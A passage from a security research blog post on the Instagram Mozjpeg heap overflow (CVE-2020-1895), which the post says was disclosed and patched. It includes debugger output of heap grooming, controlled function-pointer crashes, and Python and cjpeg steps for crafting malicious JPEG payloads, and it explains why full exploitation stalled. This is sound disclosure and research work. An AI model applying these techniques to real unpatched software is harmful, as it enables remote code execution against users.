We are at the same chunk (0x72a6200000) as our targeted large object! Let’s look at the chunk’s layout again to make sure that our overflowable buffer is at the small size class (0xe0) that we aimed to hit.

(gdb) jechunk 0x72a6200000
This chunk belongs to the arena at 0x72c808fc00.
…
...
0x72a639a000    small run (0xe0)      0x7000     7/128  <-----hit!!!
0x72a63a1000    small run (0x1000)    0x1000     1/1    
0x72a63a2000    small run (0x1000)    0x1000     1/1    
0x72a63a3000    small run (0x1000)    0x1000     1/1    
0x72a63a4000    small run (0x1000)    0x1000     1/1    
0x72a63a5000    large run             0x5000     -     <------Large targeted object!!!  

Yesss! Now let’s continue the execution and see what happens when we overwrite the large targeted object.

(gdb) c
Continuing.
[New Thread 29767.30462]
 
Thread 93 "IgExecutor #19" received signal SIGBUS, Bus error.
0xff9d9588ff989083 in ?? ()

BOOM! Exactly what we were aiming for–the crash occurred while trying to load a function address through the function pointer for our corrupted data from the overflowable object. We got a Bus error (also known as SIGBUS and is usually signal 10) which occurs when a process is trying to access memory that the CPU cannot physically address. In other words, the memory the program tried to access is not a valid memory address because it contains the data from our image that replaced the real function pointer and led to this crash!

Putting everything together

We have a controlled function call. All that is missing for a reliable exploit is to redirect execution to a convenient gadget to stack pivot, and then build an ROP stack.

Now we need to put everything together and (1) construct an image with malformed dimensions that (2) triggers the bug, which then(3)  leads to a copy of our controlled payload that  (4) diverts the execution to an address that we control.

We need to generate a corrupted JPEG with our controlled data. Therefore, our next step was to determine exactly what image formats are supported by the Mozjpeg platform. We can figure that out from that piece of code below. out_color_space represents the amount of bits per pixel that is determined according to the image format. 

switch (cinfo->out_color_space) {
  case JCS_GRAYSCALE:
    cinfo->out_color_components = 1;
    Break;
  case JCS_RGB:
  case JCS_EXT_RGB:
  case JCS_EXT_RGBX:
  case JCS_EXT_BGR:
  case JCS_EXT_BGRX:
  case JCS_EXT_XBGR:
  case JCS_EXT_XRGB:
  case JCS_EXT_RGBA:
  case JCS_EXT_BGRA: 
  case JCS_EXT_ABGR: 
  case JCS_EXT_ARGB:
    cinfo->out_color_components = rgb_pixelsize[cinfo->out_color_space];
    Break;
  case JCS_YCbCr:
  case JCS_RGB565:
      cinfo->out_color_components = 3; 
      break; 
  case JCS_CMYK:
  case JCS_YCCK:
      cinfo->out_color_components = 4;
      break;
  default:                      
    cinfo->out_color_components = cinfo->num_components;
    Break;

We used a simple Python library called PIL to construct a RGB BMP file. We chose the RGB format that is familiar and known to us and we filled it with “AAA” as payload. This file is the base image format that we use to create our malicious compressed JPEG.

from PIL import Image
 img = Image.new('RGB', (100, 100)) 
pixels = img.load() 

for i in range(img.size[0]):  
    for j in range(img.size[1]):
        pixels[i,j] = (0x41, 0x41, 0x41) 
 
img.save('rgb100.bmp')

We then used the cjpeg tool from the Mozjpeg project to compress our bmp file into a JPEG file.

./cjpeg -rgb -quality 100 -fastcrush -notrellis -notrellis-dc -noovershoot -outfile rgb100.jpg rgb100.bmp

Next, we tested the compressed output file to test our assumptions. We know that the RGB format is 3 bytes per pixel.

We verified that the code does set cinfo->out_color_space = 0x2 (JCS_RGB) correctly. However, when we checked our controlled allocation, we saw that the height and width arguments as part of the integer overflow are still multiplied by out_color_components which is equal to 4, even though we started with a RGB format using a 3×8-bits per pixel. It seems that Mozjpeg prefers to convert our image to a 4×8-bits per pixel format.

We then turned to a 4×8-bit pixels format that is supported by the Mozjpeg platform, and the CMYK format met the criteria. We used the CMYK format as a base image to give us full control over all 4 bytes. We filled the image with “AAAA” as the payload.

We compressed it to a JPEG format and added the dimensions that trigger the bug. To our delight, we got the following crash!

Thread 93 "IgExecutor #19" received signal SIGBUS, Bus error.
0xff414141ff414141 in ?? ()

However, we got a weird 0xFF bytes as part of our controlled address even though we constructed a 4×8 bits per pixel image, and the 4th component is not part of our payload.

What does this 0xFF mean? Transparency!

Bitmap file formats that support transparency include GIF, PNG, BMP, TIFF, and JPEG 2000, through either a transparent color or an alpha channel.

Bitmap-based images are technically characterized by the width and height of the image in pixels and by the number of bits per pixel. 

Therefore, we decided to construct a RGBA BMP format file with our controlled alpha channel (0x61) using the PIL library.

from PIL import Image
 img = Image.new('RGBA', (100, 100))
 pixels = img.load()
 for i in range(img.size[0]):  
     for j in range(img.size[1]):
         pixels[i,j] = (0x41, 0x41, 0x41,0x61)
 img.save('rgba100.bmp')

Surprisingly, we got the same results as when we used the CMYK malicious JPEG. We still we got an alpha channel of  0xFF as part of our controlled address even though we used a RGBA format as the base for the compressed JPEG, and we had our own alpha channel from the file with the value (0x61). How did this happen? Let’s go back to the code and understand the reason for that odd behavior.

We found the answer in this little piece of code below:

Figure 8. Setting cinfo->out_color_space to RGBA(0xC) as seen in the IDA disassembly snippet. 

We found that Instagram decided to add their own const value after jpeg_read_header finished and before calling jpeg_start_decompress.

We used the RGB format from the first test and we saw that Mozjpeg does correctly set cinfo->out_color_space = 0x2 (JCS_RGB). However, from Instagram’s code (see Figure 3) we can see that this value is overwritten by a const value of 0xc which represents the (JCS_EXT_RGBA) format.

This also explains the weird 0xFF alpha channel that we got even though we used a 3×8-bits per pixel RGB object.

After diving further into the code, we saw that value of the alpha channel (0xFF) is hard coded as a const value. When Instagram sets the cinfo->out_color_space = 0xc to point to the (JCS_EXT_RGBA) format, the code copies 3 bytes from our input base file, and then the 4th byte copied is always the hardcoded alpha channel value.

#ifdef RGB_ALPHA
      outptr[RGB_ALPHA] = 0xFF;
#endif

Now that we put everything together, we came to the conclusion that no matter what image format is used for the base of the compressed JPEG, Instagram always converts the output file to a RGBA format file. 

The fact that 0xff is always added to the beginning means we could have achieved our goal in a big-endian environment.

Little-endian systems store the least-significant byte of a word at the smallest memory address.  Because we’re dealing with a little-endian system, the alpha channel value is always written as the MSB (Most Significant Byte) of our controlled address. As we’re trying to exploit the bug in user mode, and the (0xFF) value belongs to the kernel address space, it foils our plans.

Is exploitation possible?

We lost our quick win. One lesson we can learn from this is that real life is not a CTF game, and sometimes one crucial const value set by a developer can ruin everything from an exploitation perspective.

Let’s recall the content from the main website of the Mozilla foundation about Mozjpeg:

“Mozjpeg’s sole purpose is to reduce the size of JPEG files that are served up on the web.”

From what we saw, Instagram will increase memory usage by 25% for each image we want to upload! That’s about 100 million per day!

To quote one sentence from a lecture that Halvar Flake gave in the last OffisiveCon:

“The only person in computing that is paid to actually understand the system from top to bottom is the attacker! Everybody else usually gets paid to do their parts.”

At this point, Facebook already patched the vulnerability so we stopped our exploitation effort even though we weren’t quite finished with it. 

We still have 3 bytes overwrite, and in theory we could invest more time to find more useful primitives that could help us to exploit this bug. However, we decided we did enough and we have publicized the important point that we wanted to convey.

The Mozjpeg project on Instagram is just the tip of the iceberg when talking about Mozjpeg. The Mozilla-based project is still widely used in many other projects over the web, in particular Firefox, and it is also widely used as part of different popular open-source projects such as sharp and libvips projects (on the Github platform alone, they have more than 20k stars combined).

Conclusion & Recommendations

Our blog post describes how image parsing code, as a third party library, ends up being the weakest point of Instagram’s large system. Fuzzing the exposed code turned up some new vulnerabilities which have since been fixed. It is likely that, given enough effort, one of these vulnerabilities can be exploited for RCE in a zero-click attack scenario. Unfortunately, it is also likely that other bugs remain or will be introduced in the future. As such, continuous fuzz-testing of this and similar media format parsing code, both in operating system libraries and third party libraries, is absolutely necessary. We also recommend reducing the attack surface by restricting the receiver to a small number of supported image formats.

This field has been researched a lot by various appreciated independent security researchers as well as nationally-sponsored security researchers. Media format parsing remains an important issue. See also other researcher and vendor advisories:

Facebook’s advisory described this vulnerability as an “Integer Overflow leading to Heap Buffer Overflow – large heap overflow could occur in Instagram for Android when attempting to upload an image with specially crafted dimensions. This affects versions prior to 128.0.0.26.128.” 

We at Check Point responsibly disclosed the vulnerability to Facebook, who released a patch on (February 10, 2020). Facebook acknowledged the vulnerability and assigned it CVE-2020-1895. The bug was tested for both 32bit & 64bit versions of the Instagram app.

References 

http://phrack.org/issues/68/10.html

https://googleprojectzero.blogspot.com/2020/04/fuzzing-imageio.html

https://blog.nsogroup.com/a-tale-of-two-mallocs-on-android-libc-allocators-part-3-exploitation/

https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/

https://saaramar.github.io/str_repeat_exploit/

https://googleprojectzero.blogspot.com/2015/09/stagefrightened.html

https://github.com/NorthBit/Metaphor

https://bugs.chromium.org/p/project-zero/issues/detail?id=2002

https://libjpeg-turbo.org/About/Mozjpeg

Many thanks to my colleagues Eyal Itkin (​@EyalItkin​), Oleg Ilushin, Omri Herscovici (@omriher​) for their help in this research.

POPULAR POSTS

BLOGS AND PUBLICATIONS

  • Check Point Research Publications
  • Global Cyber Attack Reports
  • Threat Research
February 17, 2020

“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign

  • Check Point Research Publications
August 11, 2017

“The Next WannaCry” Vulnerability is Here

  • Check Point Research Publications
January 11, 2018

‘RubyMiner’ Cryptominer Affects 30% of WW Networks